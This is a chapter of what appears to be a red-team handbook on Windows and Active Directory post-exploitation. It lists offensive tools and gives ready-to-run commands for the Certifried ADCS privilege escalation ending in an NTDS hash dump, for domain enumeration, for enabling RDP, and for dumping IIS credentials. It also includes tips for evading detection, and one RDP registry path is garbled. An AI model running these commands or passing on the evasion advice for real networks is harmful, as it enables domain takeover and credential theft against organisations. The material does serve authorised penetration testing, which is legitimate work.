7.1-Post-Exploitation.md

7.1 Post Exploitation

Table of Contents

• Tooling
• Active Directory Certificate Services (ADCS)
• AppLocker Enumeration
• Computer Enumeration
• DNS Record Enumeration
• Domain Enumeration
• Enable RDP
• Enumerating Groups
• Finding unquoted Service Paths
• IIS Application Pool Credential Dumping
• Kerberos Exploitation
• Serivce Principal Name (SPN) scanning
• User Enumeration

Tooling

Name	Description	URL
BloodyAD Framework	BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combining pathgen.py and autobloody.py.	https://github.com/CravateRouge/bloodyAD
Certify	Active Directory certificate abuse.	https://github.com/GhostPack/Certify
Certipy	Tool for Active Directory Certificate Services enumeration and abuse	https://github.com/ly4k/Certipy
Cortex XDR Config Extractor	Extracting Palo Alto Cortex XDR Logfiles	https://github.com/Laokoon-SecurITy/Cortex-XDR-Config-Extractor
dnsteal	This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.	https://github.com/m57/dnsteal
GTFOBins	GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.	https://gtfobins.github.io/
Impacket	Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.	https://github.com/SecureAuthCorp/impacket
JAWS	JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems.	https://github.com/411Hall/JAWS
LAPSDumper	Dumping LAPS from Python	https://github.com/n00py/LAPSDumper
LinEnum	Privilege Escalation Enumeration	https://github.com/rebootuser/LinEnum
LOLBAS	The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.	https://lolbas-project.github.io/
lsassy	Python tool to remotely extract credentials on a set of hosts.	https://github.com/Hackndo/lsassy
PEASS-ng	Privilege Escalation Awesome Scripts SUITE new generation	https://github.com/carlospolop/PEASS-ng
powercat	Netcat: The powershell version.	https://github.com/besimorhino/powercat
Powermad	PowerShell MachineAccountQuota and DNS exploit tools	https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
PowerSharpPack	Many useful offensive CSharp Projects wraped into Powershell for easy usage.	https://github.com/S3cur3Th1sSh1t/PowerSharpPack
PowerSploit	PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.	https://github.com/PowerShellMafia/PowerSploit
PowerUp	PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.	https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
PowerView	PowerView is a PowerShell tool to gain network situational awareness on Windows domains.	https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
pth-toolkit	A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems.	https://github.com/byt3bl33d3r/pth-toolkit
pwncat	Post-Exploitation Platform	https://github.com/calebstewart/pwncat
PyWhisker	Python version of the C# tool for "Shadow Credentials" attacks	https://github.com/ShutdownRepo/pywhisker
Rubeus	Rubeus is a C# toolset for raw Kerberos interaction and abuses.	https://github.com/GhostPack/Rubeus
scavenger	scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information.	https://github.com/SpiderLabs/scavenger
Seatbelt	Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.	https://github.com/GhostPack/Seatbelt
SharpCollection	Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.	https://github.com/Flangvik/SharpCollection
Sherlock	PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.	https://github.com/rasta-mouse/Sherlock
static-binaries	This repo contains a bunch of statically-linked binaries of various tools, along with the Dockerfiles / other build scripts that can be used to build them.	https://github.com/andrew-d/static-binaries
tickey	Tool to extract Kerberos tickets from Linux kernel keys.	https://github.com/TarlogicSecurity/tickey
Watson	Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.	https://github.com/rasta-mouse/Watson
WESNG	WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities.	https://github.com/bitsadmin/wesng
Whisker	Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.	https://github.com/eladshamir/Whisker
WinPwn	Automation for internal Windows Penetrationtest / AD-Security	https://github.com/S3cur3Th1sSh1t/WinPwn

Active Directory Certificate Services (ADCS)

Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)

Oliver Lyak, Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)

As long as the Object SID is missing, the exploit will work.

$ certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>
$ certipy auth -pfx ./<CERTIFICATE>.pfx -dc-ip <RHOST>
$ crackmapexec smb <RHOST> -u <USERNAME> -H <NTLMHASH> --ntds

I recommend to do DCSync / ntds only from Domain Controllers and just for a specific user like krbtgt to not raise any alarms. Even this would not be the stealthiest way.

Tooling

Certify

https://github.com/GhostPack/Certify

PS: C:\> Certify find

Certipy

https://github.com/ly4k/Certipy

https://github.com/ly4k/BloodHound/

Common Commands

$ certipy find -dc-ip <RHOST> -u <USERNAME>@<DOMAIN> -p <PASSWORD>

Certificate Handling

Account Creation

$ certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>

Authentication

$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN>

LDAP-Shell

$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN> -ldap-shell

# add_user <USERNAME>
# add_user_to_group <GROUP>

Certificate Forging

$ certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template Web -dc-ip <RHOST> -save-old

Certificate Request

Run the following command twice because of a current issue with certipy.

$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>

$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN>

Revert Changes

$ certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template <TEMPLATE> -dc-ip <RHOST> -configuration <TEMPLATE>.json

PowerShell

Add local Administrator

PS C:\> Add-DomainObjectAcl -TargetSearchbase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<DOMAIN>" -TargetIdentity <TEMPLATE> -PrincipalIdentity localadmin -Rights All

Start BloodHound Fork

$ ./BloodHound --disable-gpu-sandbox

AppLocker Enumeration

// CMD
C:\> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

// PowerShell
PS C:\> (Get-AppLockerPolicy -Local).RuleCollections
PS C:\> Get-AppLockerPolicy -Effective -Xml
PS C:\> Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
PS C:\> Get-AppLockerPolicy -Domain -LDAP "LDAP:// DC13.Contoso.com/CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=Contoso,DC=com

Computer Enumeration

Enumerate all domain computers

// CMD
C:\> net group "Domain Computers" /domain

// PowerShell
PS C:\> ([ADSISearcher]"ObjectClass=computer").FindAll()

Enumerate specific domain computers

// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=computer)(name=DC*))").FindAll()
PS C:\> ([ADSISearcher]"(&(objectClass=computer)(name=FIL01))").FindAll()

Enumerate all domain controllers

// CMD
C:\> nltest /dclist:corp.contoso.local
C:\> nslookup -type=all _ldap._tcp.dc._msdcs.corp.contoso.local
C:\> net group "domain controllers" /domain

// PowerShell
PS C:\> ([ADSISearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll()

Enumerate domain controllers which authenticated the current session

// CMD
C:\>echo %LOGONSERVER%
C:\> nltest /dsgetdc:corp.contoso.local

DNS Record Enumeration

RSAT tools are required for this.

PS C:\> Get-WindowsOptionalFeature -Online | Where Name -Match "RSAT.*" | Format-Table -Autosize
PS C:\> Add-WindowsCapability -Online -Name Rsat.Dns.Tools

PS C:\> Get-DnsRecord -RecordType A -ZoneName <ZONE> -Server <RHOST>

Domain Enumeration

Enumerate the domain name

// CMD
C:\> echo %USERDNSDOMAIN%
C:\> systeminfo | findstr /B /C:"Domain"
C:\> wmic computersystem get domain

// PowerShell
PS C:\> Get-ADDomain
PS C:\> [System.Net.Dns]::GetHostByName(($env:computerName))
PS C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Enumerate domain forest trusts

// CMD
C:\> nltest /trusted_domains
C:\> nltest /server:cdc001.corp.contoso.local /sc_query:contoso.local

// PowerShell
PS C:\> ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
PS C:\> ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest())
PS C:\> ([ADSISearcher]"(objectClass=trustedDomain)").FindAll()
PS C:\> ([ADSISearcher]"(objectClass=trustedDomain)").FindAll() | %{$a=$_.Properties["trustattributes"]; $d=$_.Properties["trustdirection"]; $t=$_.Properties["trusttype"] ; write-Host $_.Properties["distinguishedname"] $a $d $t}

Get information about the password policy

// CMD
C:\> net accounts
C:\> net accounts /domain

// PowerShell
PS C:\> Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser

Enable RDP

C:\> reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

// Tunnel RDP through 443/TCP
C:\> reg add "HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

Enumerating Groups

Enumerate all domain groups

// CMD
C:\> net group /domain

// PowerShell
PS C:\> ([ADSISearcher]"ObjectClass=group").FindAll()
PS C:\> ([ADSISearcher]"ObjectClass=group").FindAll() | %{ $_.Properties["samaccountname"] }

Finding Unquoted Service Paths

PS C:\> Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

IIS Application Pool Credential Dumping

C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*

Kerberos Exploitation

Don’t use the RC4 (NTLM) hash for Overpass-the-Hash. Request your ticket with a more secure key (AES128, AES256) if they are in use (Rubeus /asktgt /enctype:aes256) because it is less detectable.

Serivce Principal Name (SPN) scanning

Get registered services for Kerberos

PS C:\> setspn -Q */*

User Enumeration

Enumerate a single user

// CMD
C:\> net user maurice.moss /domain

// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=user)(samAccountType=805306368)(samaccountname=maurice.moss))").FindAll().Properties

Enumerate all domain users

// CMD
C:\> net user /domain

// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=user)(samAccountType=805306368))").FindAll()|ft

Enumerate all users with specific properties

// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=user)(samAccountType=805306368))").FindAll() | %{ $_.Properties["samaccountname"] }

Enumerate all members of a specific domain group

// CMD
C:\> net group "Domain Admins" /domain

// PowerShell
PS C:\> ([ADSISearcher]"(&(ObjectClass=group)(samaccountname=Domain Admins))").FindOne()
PS C:\> ([ADSISearcher]"(distinguishedname=CN=TS ACCESS,CN=Users,DC=corp,DC=contoso,DC=local)").FindOne().Properties.member

Enumerate all groups with the string "ACCESS" in the name property

//PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=group)(name=*ACCESS*))").FindAll()

Enumerate all users with a set Service Principal name (SPN)

// PowerShell
PS C:\> ([ADSISearcher]"(&(objectClass=user)(servicePrincipalName=*)(samAccountType=805306368))").FindAll()

Previous

• 7 Actions-on-Objective

Next

• 7.2 Exfiltration